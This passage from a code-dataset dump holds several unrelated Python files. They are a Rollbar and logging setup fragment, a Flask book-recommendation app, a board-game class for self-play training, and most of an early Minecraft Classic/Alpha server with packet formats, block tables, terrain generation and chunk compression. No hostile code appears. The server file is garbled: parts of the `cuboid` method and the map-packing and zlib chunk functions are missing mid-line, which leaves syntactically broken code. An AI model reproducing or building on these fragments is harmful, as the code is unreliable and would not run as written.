\"exc_value\": exc_value,\n \"traceback\": exc_traceback\n })\n rollbar.report_exc_info((exc_type, exc_value, exc_traceback))\n\n\ndef setup_raygun_handler():\n rollbar.init(os.getenv(\"ROLLBAR_TOKEN\"), environment=os.environ.get(\"QUBIT_ENVIRONMENT\", \"test\"))\n sys.excepthook = handle_exception\n\n\ndef setup_newrelic():\n if os.environ.get(\"QUBIT_ENVIRONMENT\", \"test\") == \"gcloud\":\n newrelic_initialize(\"/etc/shark/newrelic.ini\", \"production\")\n\n\ndef setup_logging():\n logger = logging.getLogger()\n\n logHandler = logging.StreamHandler()\n formatter = jsonlogger.JsonFormatter()\n logHandler.setFormatter(formatter)\n logger.addHandler(logHandler)\n logger.setLevel(logging.DEBUG)\n\n\ndef setup_database():\n database_url = os.getenv(\"DATABASE_URL\")\n engine = sqlalchemy.create_engine(database_url)\n ssession = scoped_session(sessionmaker(bind=engine))\n return ssession\n","sub_path":"shark/common/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"648863134","text":"from flask import render_template\nfrom flask import request\nfrom flaskapp import app\nfrom flaskapp.rectools import get_metadata\nfrom flaskapp.rectools import get_book_to_book_recs\nimport numpy as np\nimport pandas as pd\nimport pickle\nfrom lightfm import LightFM\nimport time\nimport random\n\n# load the recommender (model), and maps between matrices and book IDs\nwith open('opt_model.p', 'rb') as f:\n model = pickle.load(f)\nwith open('idx_to_bid.p', 'rb') as f:\n idx_to_bid = pickle.load(f)\nwith open('bid_to_idx.p', 'rb') as f:\n bid_to_idx = pickle.load(f)\n\n# \"with\" unnecessary here; Pandas closes the file after reading\nbooks_df = pd.read_csv('./data/books.csv')\n\ndef random_ids():\n now = int(time.time()*100)\n random.seed(now)\n seed_book_idxs = [random.randrange(10),\n random.randrange(10, 100),\n random.randrange(100, 1000),\n random.randrange(1000, len(bid_to_idx))]\n sorted_keys = list(bid_to_idx.keys())\n sorted_keys.sort()\n seed_book_ids = [sorted_keys[idx] for idx in seed_book_idxs]\n return seed_book_ids\n\n@app.route('/')\n@app.route('/index')\ndef index():\n return render_template(\"index.html\")\n\n@app.route('/otak')\ndef otak():\n # having a while loop provides robustness during development/debugging\n n_seed_books = 0\n while n_seed_books < 4:\n seed_book_ids = random_ids()\n seed_books = get_metadata( seed_book_ids, books_df, len(seed_book_ids))\n n_seed_books = len(seed_books)\n print('Got {} seed books'.format(n_seed_books))\n print(seed_books)\n return render_template(\"otak.html\", seed_books = seed_books) \n\n@app.route('/output')\ndef otak_output():\n seed_book_id = int(request.args.get('bid'))\n recs = get_book_to_book_recs(seed_book_id, bid_to_idx, idx_to_bid, model)\n # the seed book is actually the first recommendation because it's the most similar\n seed_book = get_metadata(recs, books_df, 1)[0]\n rec_books = get_metadata(recs[1:], books_df, 10)[:4]\n for rec in rec_books:\n print(rec)\n return render_template(\"output.html\", seed_book = seed_book, rec_books = rec_books)\n\n@app.route('/aboutme')\ndef aboutme():\n return render_template(\"aboutme.html\")\n\n@app.route('/aboutotak')\ndef aboutotak():\n return render_template(\"aboutotak.html\")\n","sub_path":"flask/flaskapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"71653155","text":"import sys\nsys.path.append('..')\nfrom Game import Game\nfrom .Boese2Logic import Board\nimport numpy as np\n\nclass Boese2Game(Game):\n\n def __init__(self, n):\n self.n = n\n self.Es = {}\n \n def getInitBoard(self):\n b = Board(self.n)\n self.Es = {}\n self.Es[self.stringRepresentation(np.array(b.pieces))] = 0\n return np.array(b.pieces)\n\n def getBoardSize(self):\n # (a,b) tuple\n return (self.n, self.n)\n \n def getActionSize(self):\n # return number of actions\n return self.n*self.n\n \n def getNextState(self, board, player, action):\n b = Board(self.n, True)\n b.pieces = np.copy(board)\n move = (int(action/self.n), action%self.n)\n result = b.execute_move(move, player)\n self.Es[self.stringRepresentation(np.array(b.pieces))] = result\n # if self.move == 3:\n # b.seccond_move(-player)\n # self.move += 1\n # return (b.pieces, player)\n return (b.pieces, -player)\n \n def getValidMoves(self, board, player):\n # return a fixed size binary vector\n valids = [0]*self.getActionSize()\n b = Board(self.n, True)\n b.pieces = np.copy(board)\n legalMoves = b.get_legal_moves()\n for x, y in legalMoves:\n valids[self.n*x+y]=1\n return np.array(valids)\n \n #White Won: 1\n #Black Won: -1\n #Draw: 1e-4\n #No Result: 0\n def getGameEnded(self, board, player):\n s = self.stringRepresentation(board)\n r = 0\n try:\n r = self.Es[s]\n except:\n r = self.Es[self.stringRepresentation(self.getCanonicalForm(board, -player))]\n if r*r == 1:\n r = -r\n self.Es[s] = r\n if r*r == 1:\n #print(\"Moves played: \" + str(self.move))\n return player*r\n return r\n \n def getCanonicalForm(self, board, player):\n # return state if player==1, else return -state if player==-1\n if player == 1:\n return board\n with np.nditer(board, op_flags=['readwrite']) as it:\n for x in it:\n if x*x == 1:\n x[...] = -x\n return board\n \n def getSymmetries(self, board, pi):\n # mirror, rotational\n pi_board = np.reshape(pi, (self.n, self.n))\n l = []\n\n for i in range(1, 5):\n for j in [True, False]:\n newB = np.rot90(board, i)\n newPi = np.rot90(pi_board, i)\n if j:\n newB = np.fliplr(newB)\n newPi = np.fliplr(newPi)\n l += [(newB, list(newPi.ravel()))]\n return l\n \n def stringRepresentation(self, board):\n return board.tostring()","sub_path":"boese2/Boese2Game.py","file_name":"Boese2Game.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"641542713","text":"#!/usr/bin/python3\n\n#from __future__ import gzip\nimport socket\nimport urllib.request\nimport struct\nimport time\nimport math\nimport gzip\nimport zlib\nimport random\nimport os.path\nimport hashlib\nimport threading\n#import re\n\nrandom.seed(None)\n\ndebug = 0\nif debug: print (\"Debug mode is ON, you wil be throughly spammed.\")\n\n### CONSTANTS ###\n\n#P = {} ## Clasic Packet IDs\nPC_IDENT = 0x00\nPC_PING = 0x01\nPC_LEVEL_INIT = 0x02\nPC_LEVEL_CHUNK = 0x03\nPC_LEVEL_FINALIZE = 0x04\nPC_SET_BLOCK_CLIENT = 0x05\nPC_SET_BLOCK_SERVER = 0x06\nPC_SPAWN_PLAYER = 0x07\nPC_PLAYER_TELEPORT = 0x08\nPC_PLAYER_MOVE = 0x09\nPC_PLAYER_POSITION = 0x0a\nPC_PLAYER_ORIENTATION = 0x0b\nPC_DESPAWN_PLAYER = 0x0c\nPC_MESSAGE = 0x0d\nPC_DISCONNECT = 0x0e\nPC_PLAYER_TYPE = 0x0f\n\nPACKETS={ ## Clasic Packet Formats\nPC_IDENT : \"BSSB\",\nPC_PING : \"\",\nPC_LEVEL_INIT : \"\",\nPC_LEVEL_CHUNK : \"HAB\",\nPC_LEVEL_FINALIZE : \"HHH\",\nPC_SET_BLOCK_CLIENT : \"HHHBB\",\nPC_SET_BLOCK_SERVER : \"HHHB\",\nPC_SPAWN_PLAYER : \"BSHHHBB\",\nPC_PLAYER_TELEPORT : \"BHHHBB\", #B ???\nPC_PLAYER_MOVE : \"BbbbBB\",\nPC_PLAYER_POSITION : \"Bbbb\",\nPC_PLAYER_ORIENTATION : \"BBB\",\nPC_DESPAWN_PLAYER : \"B\",\nPC_MESSAGE : \"BS\",\nPC_DISCONNECT : \"S\"\n}\n\nfor packet_id in PACKETS:\n PACKETS[packet_id] = PACKETS[packet_id].replace(\"S\", \"64s\").replace(\"A\", \"1024s\")\n\n## Alpha Packet IDs\nPA_KEEPALIVE = 0x00\nPA_IDENT = 0x01\nPA_HANDSHAKE = 0x02\nPA_CHAT_MESSAGE = 0x03\nPA_TIME_UPDATE = 0x04\nPA_ENTITY_EQUIPMENT = 0x05\nPA_SPAWN_POSITION = 0x06\nPA_USE_ENTITY = 0x07\nPA_UPDATE_HEALTH = 0x08\nPA_RESPAWN = 0x09\nPA_PLAYER = 0x0A\nPA_PLAYER_POSITION = 0x0B\nPA_PLAYER_LOOK = 0x0C\nPA_PLAYER_POSITION_AND_LOOK = 0x0D\nPA_PLAYER_DIGGING = 0x0E\nPA_PLAYER_BLOCK_PLACEMENT = 0x0F\nPA_HOLDING_CHANGE = 0x10\n## ??? 0x11\nPA_ANIMATION = 0x12\n## ??? 0x13\nPA_NAMED_ENTITY_SPAWN = 0x14\nPA_PICKUP_SPAWN = 0x15\nPA_COLLECT_ITEM = 0x16\nPA_ADD_OBJECT_OR_VEHICLE = 0x17\nPA_MOB_SPAWN = 0x18\n## ??? 0x19 to 0x1B\nPA_ENTITY_VELOCITY = 0x1C\nPA_DESTROY_ENTITY = 0x1D\nPA_ENTITY = 0x1E\nPA_ENTITY_RELATIVE_MOVE = 0x1F\nPA_ENTITY_LOOK = 0x20\nPA_ENTITY_LOOK_AND_RELATIVE_MOVE = 0x21\nPA_ENTITY_TELEPORT = 0x22\n## ??? 0x23 to 0x25\nPA_ENTITY_STATUS = 0x26\nPA_ATTACH_ENTITY = 0x27\n## ??? 0x28 to 0x31\nPA_PRE_CHUNK = 0x32\nPA_MAP_CHUNK = 0x33\nPA_MULTI_BLOCK_CHANGE = 0x34\nPA_BLOCK_CHANGE = 0x35\n## ??? 0x36 to 0x3B\nPA_EXPLOSION = 0x3C\n## ??? 0x3D to 0x63\nPA_OPEN_WINDOW = 0x64\nPA_WINDOW_CLOSE = 0x65\nPA_WINDOW_CLICK = 0x66\nPA_SET_SLOT = 0x67 # v8\nPA_WINDOW_ITEMS = 0x68 # v8\nPA_UNKNOWN_69 = 0x69\nPA_UNKNOWN_6A = 0x6A\n## ??? 0x6B to 0x81\nPA_UPDATE_SIGN = 0x82\n## ??? 0x83 to 0xFE\nPA_DISCONNECT_OR_KICK = 0xFF\n\nA_PACKETS={ ## Alpha Packet Formats\nPA_KEEPALIVE : \"\",\nPA_IDENT : \"iSSqB\",\nPA_HANDSHAKE : \"S\",\nPA_CHAT_MESSAGE : \"S\",\nPA_TIME_UPDATE : \"q\",\nPA_ENTITY_EQUIPMENT : \"ihh\", ## Tricky to parse # Changed in v8\nPA_SPAWN_POSITION : \"iii\",\nPA_USE_ENTITY : \"ii?\",\nPA_UPDATE_HEALTH : \"h\",\nPA_RESPAWN : \"\",\nPA_PLAYER : \"?\",\nPA_PLAYER_POSITION : \"dddd?\",\nPA_PLAYER_LOOK : \"ff?\",\nPA_PLAYER_POSITION_AND_LOOK : \"ddddff?\",\nPA_PLAYER_DIGGING : \"biBiB\",\nPA_PLAYER_BLOCK_PLACEMENT : \"iBiBT\",\nPA_HOLDING_CHANGE : \"h\",\nPA_ANIMATION : \"iB\",\nPA_NAMED_ENTITY_SPAWN : \"iSiiiBBh\",\nPA_PICKUP_SPAWN : \"ihBiiiBBB\",\nPA_COLLECT_ITEM : \"ii\",\nPA_ADD_OBJECT_OR_VEHICLE : \"iBiii\",\nPA_MOB_SPAWN : \"iBiiiBB\",\nPA_ENTITY_VELOCITY : \"ihhh\",\nPA_DESTROY_ENTITY : \"i\",\nPA_ENTITY : \"i\",\nPA_ENTITY_RELATIVE_MOVE : \"ibbb\",\nPA_ENTITY_LOOK : \"ibb\",\nPA_ENTITY_LOOK_AND_RELATIVE_MOVE : \"ibbbbb\",\nPA_ENTITY_TELEPORT : \"iiiiBB\",\nPA_ENTITY_STATUS : \"ib\",\nPA_ATTACH_ENTITY : \"ii\",\nPA_PRE_CHUNK : \"ii?\",\nPA_MAP_CHUNK : None, ## Tricky to parse\nPA_MULTI_BLOCK_CHANGE : None, ## Tricky to parse\nPA_BLOCK_CHANGE : \"ibibb\",\nPA_EXPLOSION : None, ## Tricky to parse\nPA_OPEN_WINDOW : \"BbSb\",\nPA_WINDOW_CLOSE : \"B\",\nPA_WINDOW_CLICK : \"BhBhT\", ## Tricky to parse\nPA_SET_SLOT : None, ## Tricky to parse\nPA_WINDOW_ITEMS : None, # v8\nPA_UNKNOWN_69 : \"bbh\", ## Unknown\nPA_UNKNOWN_6A : \"bhb\", ## Unknown\nPA_UPDATE_SIGN : \"ihis\",\nPA_DISCONNECT_OR_KICK : \"S\" # S not s!!!\n}\n#for packet_id in A_PACKETS:\n# if A_PACKETS[packet_id]!= None: A_PACKETS[packet_id] = A_PACKETS[packet_id].replace(\"S\", \"hS\")\n\nB = {} # This should be stored in a text file somewhere later.\nB['air'] = 0x00\nB['stone'] = 0x01\nB['grass'] = 0x02\nB['dirt'] = 0x03\nB['cobblestone'] = 0x04\nB['wood'] = 0x05\nB['sapling'] = 0x06\nB['adminium'] = 0x07\nB['bedrock'] = 0x07 ## SYNONYM\nB['water'] = 0x08\nB['stationarywater'] = 0x09\nB['lava'] = 0x0a\nB['stationarylava'] = 0x0b\nB['sand'] = 0x0c\nB['gravel'] = 0x0d\nB['goldore'] = 0x0e\nB['ironore'] = 0x0f\nB['coalore'] = 0x10\nB['log'] = 0x11\nB['leaves'] = 0x12\nB['sponge'] = 0x13\nB['glass'] = 0x14\nB['redcloth'] = 0x15\nB['orangecloth'] = 0x16\nB['yellowcloth'] = 0x17\nB['limecloth'] = 0x18\nB['greencloth'] = 0x19\nB['aquagreencloth'] = 0x1a\nB['cyancloth'] = 0x1b\nB['bluecloth'] = 0x1c\nB['purplecloth'] = 0x1d\nB['indigocloth'] = 0x1e\nB['violetcloth'] = 0x1f\nB['magentacloth'] = 0x20\nB['pinkcloth'] = 0x21\nB['blackcloth'] = 0x22\nB['greycloth'] = 0x23\nB['graycloth'] = 0x23 ## SYNONYM\nB['wool'] = 0x23 ## SYNONYM\nB['whitecloth'] = 0x24\nB['yellowflower'] = 0x25\nB['redrose'] = 0x26\nB['redflower'] = 0x26 ## SYNONYM\nB['brownmushroom'] = 0x27\nB['redmushroom'] = 0x28\nB['goldblock'] = 0x29\nB['ironblock'] = 0x2a\nB['doublestep'] = 0x2b\nB['doubleslab'] = 0x2b\nB['slab'] = 0x2c\nB['step'] = 0x2c ## SYNONYM\nB['brick'] = 0x2d\nB['tnt'] = 0x2e\nB['bookshelf'] = 0x2f\nB['mossstone'] = 0x30\nB['mossycobblestone'] = 0x30\nB['obsidian'] = 0x31\nB['torch'] = 0x32\nB['fire'] = 0x33\nB['mobspawner'] = 0x34\nB['woodenstairs'] = 0x35\nB['chest'] = 0x36\nB['redstonewire'] = 0x37\nB['diamondore'] = 0x38\nB['diamondblock'] = 0x39\nB['workbench'] = 0x3a\nB['crops'] = 0x3b\nB['wheat'] = 0x3b ## SYNONYM\nB['soil'] = 0x3c\nB['furnace'] = 0x3d\nB['burningfurnace'] = 0x3e\nB['signpost'] = 0x3f\nB['woodendoor'] = 0x40\nB['ladder'] = 0x41\nB['minecarttracks'] = 0x42\nB['cobblestonestairs'] = 0x43\nB['wallsign'] = 0x44\nB['lever'] = 0x45\nB['stonepressureplate'] = 0x46\nB['irondoor'] = 0x47\nB['woodenpressureplate'] = 0x48\nB['redstoneore'] = 0x49\nB['glowingredstoneore'] = 0x4a\nB['redstonetorchoff'] = 0x4b\nB['redstonetorchon'] = 0x4c\nB['redstonetorch'] = 0x4c ## SYNONYM\nB['stonebutton'] = 0x4d\nB['button'] = 0x4d ## SYNONYM\nB['snow'] = 0x4e\nB['ice'] = 0x4f\nB['snowblock'] = 0x50\nB['cactus'] = 0x51\nB['clay'] = 0x52\nB['reed'] = 0x53\nB['reeds'] = 0x53 ## SYNONYM\nB['jukebox'] = 0x54\nB['fence'] = 0x55\nB['pumpkin'] = 0x56\nB['netherrack'] = 0x57\nB['soulsand'] = 0x58\nB['glowstone'] = 0x59\nB['portal'] = 0x5a\nB['jackolantern'] = 0x5b\n\n## Blocks valid in classic\nC_BLOCKS = list(range(B['air'],B['obsidian']+1))\n## Block conversions for non-classic blocks\nCONVERSIONS = {}\nCONVERSIONS['internal'] = {}\nCONVERSIONS['classic'] = {}\nCONVERSIONS['alpha'] = {}\nCONVERSIONS['internal']['classic'] = {\nB['torch'] : B['redmushroom'],\nB['fire'] : B['air'], ## unconvertable, unplacable\nB['woodenstairs'] : B['wood'],\nB['chest'] : B['wood'],\nB['redstonewire'] : B['redmushroom'],\nB['diamondore'] : B['goldore'],\nB['diamondblock'] : B['goldblock'],\nB['workbench'] : B['wood'],\nB['crops'] : B['sapling'],\nB['soil'] : B['dirt'],\nB['furnace'] : B['stone'],\nB['burningfurnace'] : B['stone'],\nB['signpost'] : B['brownmushroom'],\nB['woodendoor'] : B['glass'], #todo: glass and wood\nB['ladder'] : B['water'],\nB['minecarttracks'] : B['brownmushroom'],\nB['cobblestonestairs'] : B['cobblestone'],\nB['wallsign'] : B['brownmushroom'],\nB['lever'] : B['brownmushroom'],\nB['stonepressureplate'] : B['brownmushroom'],\nB['irondoor'] : B['glass'],\nB['woodenpressureplate'] : B['brownmushroom'],\nB['redstoneore'] : B['ironore'],\nB['glowingredstoneore'] : B['ironore'],\nB['redstonetorchoff'] : B['redmushroom'],\nB['redstonetorchon'] : B['redmushroom'],\nB['stonebutton'] : B['brownmushroom'],\nB['snow'] : B['grass'],\nB['ice'] : B['glass'],\nB['snowblock'] : B['whitecloth'],\nB['cactus'] : B['leaves'],\nB['clay'] : B['greycloth'],\nB['reed'] : B['sapling'],\nB['jukebox'] : B['wood'],\nB['fence'] : B['wood'],\nB['pumpkin'] : B['orangecloth'],\nB['netherrack'] : B['dirt'],\nB['soulsand'] : B['gravel'],\nB['glowstone'] : B['yellowcloth'],\nB['portal'] : B['indigocloth'],\nB['jackolantern'] : B['orangecloth']\n}\n\nCONVERSIONS['internal']['alpha'] ={\nB['redcloth'] : B['wool'],\nB['orangecloth'] : B['wool'],\nB['yellowcloth'] : B['wool'],\nB['limecloth'] : B['wool'],\nB['greencloth'] : B['wool'],\nB['aquagreencloth'] : B['wool'],\nB['cyancloth'] : B['wool'],\nB['bluecloth'] : B['wool'],\nB['purplecloth'] : B['wool'],\nB['indigocloth'] : B['wool'],\nB['violetcloth'] : B['wool'],\nB['magentacloth'] : B['wool'],\nB['pinkcloth'] : B['wool'],\nB['blackcloth'] : B['wool'],\nB['greycloth'] : B['wool'],\nB['whitecloth'] : B['wool']\n}\n\nCONVERSIONS['alpha']['internal'] ={\nB['wool'] : B['whitecloth']\n}\n\n## Blocks valid in Alpha\nA_BLOCKS = list(range(B['air'],B['glass']+1))\\\n + [B['wool']]\\\n + list(range(B['yellowflower'],B['jackolantern']+1))\n \n## \"Safe\" inventory for Alpha \nA_INVENTORY = list(range(B['air'],B['sapling']+1))\\\n + list(range(B['water'],B['glass']+1))\\\n + list(range(0x15, 0x19))\\\n + list(range(B['yellowflower'],B['torch']+1))\\\n + list(range(B['mobspawner'],B['workbench']+1))\\\n + list(range(B['soil'],B['jackolantern']+1))\n\n\ndef get_block_name(get_block_id):\n for block_name, block_id in B.items():\n if block_id == get_block_id:\n return block_name\n return None\n \ndef get_block_conversions(id):\n string = \", \"\n for protocol_to_name, protocol_to in CONVERSIONS['internal'].items():\n for block_from, block_to in protocol_to.items():\n if block_from == id:\n string+=\"{} in {}, \".format(get_block_name(block_to), protocol_to_name)\n return string.rstrip(\", \")\n\nclass Item:\n def __init__(self, type, amount=1, uses=0):\n self.type = type\n self.amount = amount\n self.uses = uses\n \n def __str__(self):\n return \"Item {} ({}); amount {}; uses {}\".format(self.type, get_block_name(self.type), self.amount, self.uses)\n \n def pack(self):\n if self.type == None:\n return struct.pack(\">h\", -1)\n else:\n return struct.pack(\">hBh\", self.type, self.amount, self.uses)\n\nclass Block:\n def __init__(self):\n self.alphatype = B['air']\n self.classictype = B['air']\n self.internaltype = B['air']\n \n self.changed_by = 0\n self.changed_on = time.time()\n self.metadata = 0\n self.light = 15\n self.sunlight = 15\n \n def __str__(self):\n type = self.get(\"internal\")\n return (\"Block type {} ({}{}); last changed on {} by {}\".format(type,get_block_name(type), get_block_conversions(type), self.changed_on,server.get_name_for_persistent_id(self.changed_by)))\n \n def get(self,protocol='internal'): ## Returns block type (converting to specified protocol)\n ##if protocol != 'internal':\n ## try:\n ## return CONVERSIONS['internal'][protocol][self.type]\n ## except KeyError:\n ## return self.type\n ##else:\n ## return self.type\n if protocol == 'alpha':\n return self.alphatype\n elif protocol == 'classic':\n return self.classictype\n elif protocol == 'internal':\n return self.internaltype\n \n def set(self,protocol,newtype): ## Sets block type (converting from specified protocol)\n try:\n self.alphatype = CONVERSIONS[protocol]['alpha'][newtype]\n except KeyError:\n self.alphatype = newtype\n try:\n self.classictype = CONVERSIONS[protocol]['classic'][newtype]\n except KeyError:\n self.classictype = newtype\n try:\n self.internaltype = CONVERSIONS[protocol]['internal'][newtype]\n except KeyError:\n self.internaltype = newtype\n \n def high(self):\n return self.metadata | (self.light>>4)\n\n def update(self, new_type, metadata=None, persistent_id=0):\n self.set('internal', new_type)\n if metadata != None:\n self.metadata = metadata\n else:\n self.metadata = 0\n self.changed_by = persistent_id\n self.changed_on = time.time()\n \n def serialize(self):\n return struct.pack('>BHf',self.get('internal'),self.changed_by,self.changed_on)\n \n def deserialize(self,serialized):\n type,self.changed_by,self.changed_on = struct.unpack('>BHf',serialized)\n self.set('internal',type)\n\nclass World:\n def __init__(self, name=\"main\", map_x=64, map_y=127, map_z=64):\n self.name = name\n self.map_x = map_x\n self.map_y = map_y\n self.map_z = map_z\n self.block_queue = []\n \n def serializeheader(self):\n return struct.pack('>64sHHH',self.name,self.map_x,self.map_y,self.map_z)\n \n def deserializeheader(self,serialized):\n self.name,self.map_x,self.map_y,self.map_z = struct.unpack('>64sHHH',serialized)\n self.name.rstrip()\n \n def save(self,filename):\n file = open(filename,'wb')\n file.write(self.serializeheader())\n for i in range(self.map_x):\n for j in range(self.map_y):\n for k in range(self.map_z):\n file.write(self.map[i][j][k].serialize())\n file.close()\n \n def load(self,filename):\n self.empty() ## Initialize map\n file = open(filename,'rb')\n self.deserializeheader(file.read(struct.calcsize('>64sHHH')))\n for i in range(self.map_x):\n for j in range(self.map_y):\n for k in range(self.map_z):\n self.map[i][j][k].deserialize(file.read(struct.calcsize('>BHf')))\n file.close()\n \n def empty(self):\n self.map = [[[Block() for x in range(self.map_x)] for y in range(self.map_y)] for z in range(self.map_z)]\n \n def create_flatgrass(self):\n print (\"Generating flatgrass map...\")\n self.empty() \n for x in range(self.map_x):\n for y in range(self.map_y//2):\n for z in range(self.map_z):\n if y == (self.map_y//2)-1:\n self.map[x][y][z].set('internal',B['grass'])\n elif y == 0:\n self.map[x][y][z].set('internal',B['bedrock'])\n else:\n self.map[x][y][z].set('internal',B['dirt'])\n print (\"Done!\")\n \n def create_landscape(self): \n ## http://www.dreamincode.net/forums/topic/66480-perlin-noise/ - Credit where credit is due :)\n print (\"Creating empty map...\")\n self.empty()\n print (\"Generating \\\"realistic\\\" map...\")\n for x in range(self.map_x): ## WATER!\n for y in range(self.map_y//2):\n for z in range(self.map_z):\n self.map[x][y][z].set('internal',B['water'])\n random.seed() ## Seed random number gen, stops always same map\n mapsize = self.map_x*self.map_y*self.map_z\n xoffset = random.randint(0-mapsize,mapsize) ## Make random offsets to make more random map\n random.seed(xoffset)\n zoffset = random.randint(0-mapsize,mapsize)\n for i in range(self.map_x):\n for j in range(self.map_z):\n height = math.floor(self.perlin_noise(i/10+xoffset,j/10+zoffset)*(self.map_y//16)+self.map_y//2)\n for k in range(height):\n if k == (height)-1:\n if k < self.map_y//2: ## Below water level\n self.map[i][k][j].set('internal',B['sand']) ## SAND!\n else:\n self.map[i][k][j].set('internal',B['grass']) ## GRASS!\n if random.randint(0,20)==10:\n self.place_tree(i,k+1,j) ## TREES!\n elif k > (height)-(height//6): ## DIRT!\n self.map[i][k][j].set('internal',B['dirt'])\n elif k == 0: ## BEDROCK!\n self.map[i][k][j].set('internal',B['bedrock'])\n else: \n if random.randint(0,20)!=10: ## STONE!\n self.map[i][k][j].set('internal',B['stone'])\n else: ## ORES!\n self.map[i][k][j].set('internal',random.choice([B['ironore'],B['goldore'],B['coalore'],B['diamondore'], B['redstoneore']]))\n print (\"Done!\")\n \n def perlin_findnoise2(self,x,y): ## Used by create_landscape\n n=math.floor(x)+math.floor(y)*57\n n=(n<<13)^n\n nn=(n*(n*n*60493+19990303)+1376312589)&0x7fffffff\n return 1.0-(nn/1073741824.0)\n \n def perlin_interpolate1(self,a,b,x): ## Used by create_landscape\n ft=x * 3.1415927\n f=(1.0-math.cos(ft))* 0.5\n return a*(1.0-f)+b*f\n \n def perlin_noise(self,x,y): ## Used by create_landscape\n floorx=math.floor(x) ##This is kinda a cheap way to floor a double integer.\n floory=math.floor(y)\n s=self.perlin_findnoise2(floorx,floory)\n t=self.perlin_findnoise2(floorx+1,floory)\n u=self.perlin_findnoise2(floorx,floory+1) ##Get the surrounding pixels to calculate the transition.\n v=self.perlin_findnoise2(floorx+1,floory+1)\n int1=self.perlin_interpolate1(s,t,x-floorx) ##Interpolate between the values.\n int2=self.perlin_interpolate1(u,v,x-floorx) ##Here we use x-floorx, to get 1st dimension. Don't mind the x-floorx thingie, it's part of the cosine formula.\n return self.perlin_interpolate1(int1,int2,y-floory) ##Here we use y-floory, to get the 2nd dimension.\n \n def place_tree(self, x, y, z):\n if (y+4)<(self.map_y-1) and (x-1)>0 and (x+1)<(self.map_x-1) and (z-1)>0 and (z+1)<(self.map_z-1):\n self.map[x ][y ][z ].set('internal',B['log'])\n self.map[x ][y+1][z ].set('internal',B['log'])\n self.map[x ][y+2][z ].set('internal',B['log'])\n self.map[x ][y+3][z ].set('internal',B['log'])\n self.map[x ][y+4][z ].set('internal',B['leaves'])\n \n self.map[x-1][y+3][z ].set('internal',B['leaves'])\n self.map[x+1][y+3][z ].set('internal',B['leaves'])\n self.map[x ][y+3][z-1].set('internal',B['leaves'])\n self.map[x ][y+3][z+1].set('internal',B['leaves'])\n self.map[x-1][y+3][z-1].set('internal',B['leaves'])\n self.map[x+1][y+3][z+1].set('internal',B['leaves'])\n self.map[x-1][y+3][z+1].set('internal',B['leaves'])\n self.map[x+1][y+3][z-1].set('internal',B['leaves'])\n \n self.map[x-1][y+2][z ].set('internal',B['leaves'])\n self.map[x+1][y+2][z ].set('internal',B['leaves'])\n self.map[x ][y+2][z-1].set('internal',B['leaves'])\n self.map[x ][y+2][z+1].set('internal',B['leaves'])\n else:\n return False\n \n def place_fucked_tree(self, x, y, z): # This was the original tree code, didn't work right, but kept because it looks awesome\n if (y+6)<(self.map_y-1) and (x-1)>0 and (x+1)<(self.map_x-1) and (z-1)>0 and (z+1)<(self.map_z-1):\n for i in range(y,y+4+1):\n self.map[x][i][z].set('internal',B['log'])\n self.map[x][y+6][z].set('internal',B['leaves'])\n self.map[x][i+5][z].set('internal',B['leaves'])\n self.map[x-1][i+4][z].set('internal',B['leaves'])\n self.map[x+1][i+4][z].set('internal',B['leaves'])\n self.map[x][i+4][z-1].set('internal',B['leaves'])\n self.map[x][i+4][z+1].set('internal',B['leaves'])\n else:\n return False\n \n def spam_blocks(self):\n server.message_queue.append(\"§eServer: Refreshing map\")\n for x in range(self.map_x):\n for y in range(self.map_y):\n for z in range(self.map_z):\n self.block_queue.append((x, y, z))\n \n def set_block(self, x, y, z, set_block, player, persistent_id, metadata=None):\n if self.block_at(x, y, z) != None:\n try:\n self.map[x][y][z].update(set_block, metadata, persistent_id)\n self.block_queue.append((x, y, z))\n except IndexError:\n return None\n else:\n return self.map[x][y][z]\n else: return None\n \n def cuboid(self, x1, y1, z1, x2, y2, z2, set_block, player, persistent_id):\n if x2L\", self.count_blocks())\n \n for y in range(self.map_y):\n for z in range(self.map_z):\n for x in range(self.map_x):\n ##to_gzip+=struct.pack(\">B\", self.map[x][y][z].get(\"classic\"))\n to_gzip+=struct.pack(\">B\", self.map[x][y][z].classictype)\n \n #gzipped_map = gzip.compress(to_gzip) # only in dev :(\n ##f = gzip.GzipFile('map.gz', 'wb', compresslevel=1)\n f = gzip.GzipFile('map.gz', 'wb', compresslevel=9)\n f.write(to_gzip)\n f.close()\n return open('map.gz', 'rb')\n \n def zlib_map(self,x1,y1,z1,chunk_x,chunk_y,chunk_z): ## This is such a massive hack it shouldn't work, yet it does, beautifully\n map_to_zlib = b\"\"\n nib1_to_zlib = b\"\"\n nib2_to_zlib = b\"\"\n nib3_to_zlib = b\"\"\n nib1_last = None\n nib2_last = None\n nib3_last = None\n invalidate = True if x1 < 0 or y1 < 0 or z1 < 0 or x1 > server.main.map_x or y1 > server.main.map_y or z1 > server.main.map_z else False\n \n ibwater = struct.pack(\">B\",B[\"water\"])\n ibbrock = struct.pack(\">B\",B[\"bedrock\"])\n ibempty = struct.pack(\">B\",B[\"air\"])\n for x in range(x1,x1+chunk_x):\n for z in range(z1,z1+chunk_z):\n for y in range(y1,y1+chunk_y):\n invalid = invalidate\n if invalid != True:\n try: self.map[x][y][z]\n except IndexError: ## This shouldn't happen, but will sometimes\n invalid = True\n if invalid:\n map_to_zlib+=ibempty if y>chunk_y//2-1 else ibbrock if yB\",self.map[x][y][z].get(\"alpha\"))\n nib1 = self.map[x][y][z].metadata\n nib2 = self.map[x][y][z].light\n nib3 = self.map[x][y][z].sunlight\n if nib1_last == None: \n nib1_last = nib1\n nib2_last = nib2\n nib3_last = nib3\n else:\n nib1_to_zlib += struct.pack(\">B\", nib1_last | (nib1<<4))\n nib2_to_zlib += struct.pack(\">B\", nib2_last | (nib2<<4))\n nib3_to_zlib += struct.pack(\">B\", nib3_last | (nib3<<4))\n nib1_last = None\n return zlib.compress(map_to_zlib+nib1_to_zlib+nib2_to_zlib+nib3_to_zlib, 1)\n\n \nclass Client:\n \"\"\" A class defining a generic client connected to the server. \"\"\"\n def __init__(self, conn, addr, first_byte):\n self.name = \"Player\"\n self.conn = conn\n self.addr = addr\n \n self.pid = {'classic': 